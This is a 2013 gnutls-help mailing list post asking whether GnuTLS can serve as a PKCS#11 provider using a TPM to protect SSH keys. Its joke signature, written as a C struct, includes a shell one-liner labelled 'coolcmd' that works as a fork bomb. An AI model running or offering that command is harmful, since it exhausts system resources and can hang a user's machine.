[gnutls-help] Using TPM with PKCS#11 applications

Thomas Habets thomas at habets.se
Thu Dec 5 15:53:20 CET 2013


Reading http://www.gnutls.org/manual/html_node/Hardware-security-modules-and-abstract-key-types.html
I understand the situation to be that GnuTLS has support for TPM chips
via libtspi, and GnuTLS supports *using* PKCS#11, but doesn't support
being used as a PKCS#11 provider. Is that right?

I want TPM behind a PKCS11 provider to protect SSH client keys, and
have written a pkcs11 module that works directly with libtspi. I'm
trying to find out if GnuTLS has code for this already:

typedef struct me_s {
 char name[]      = { "Thomas Habets" };
 char email[]     = { "thomas at habets.pp.se" };
 char kernel[]    = { "Linux" };
 char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt" };
 char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
 char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

More information about the Gnutls-help mailing list